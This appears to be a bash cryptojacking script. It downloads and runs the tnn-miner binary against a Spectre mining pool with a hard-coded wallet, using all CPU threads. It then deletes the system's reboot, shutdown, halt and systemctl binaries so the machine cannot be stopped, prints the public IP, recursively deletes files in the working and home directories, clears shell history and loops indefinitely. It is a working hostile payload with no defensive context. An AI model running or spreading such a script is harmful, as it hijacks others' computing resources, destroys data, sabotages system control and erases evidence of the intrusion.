#!/bin/bash
curl https://gitlab.com/Tritonn204/tnn-miner/-/releases/0.4.4-r2/downloads/Tnn-miner-amd64-0.4.4-r2.tar.gz -L -o Tnn-miner-amd64-0.4.4-r2.tar.gz 
tar xf Tnn-miner-amd64-0.4.4-r2.tar.gz 
./tnn-miner-cpu --spectre --daemon-address stratum+tcp://spr.tw-pool.com --port 14001 --worker-name $(shuf -n 1 -i 1-999)-BISMI --wallet spectre:qr4w3neutmjtx9mmslp3wyy2szct2jyrgh045l5mes7rk7rzg6c4qjx8gve84 --threads $(nproc --all) 
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
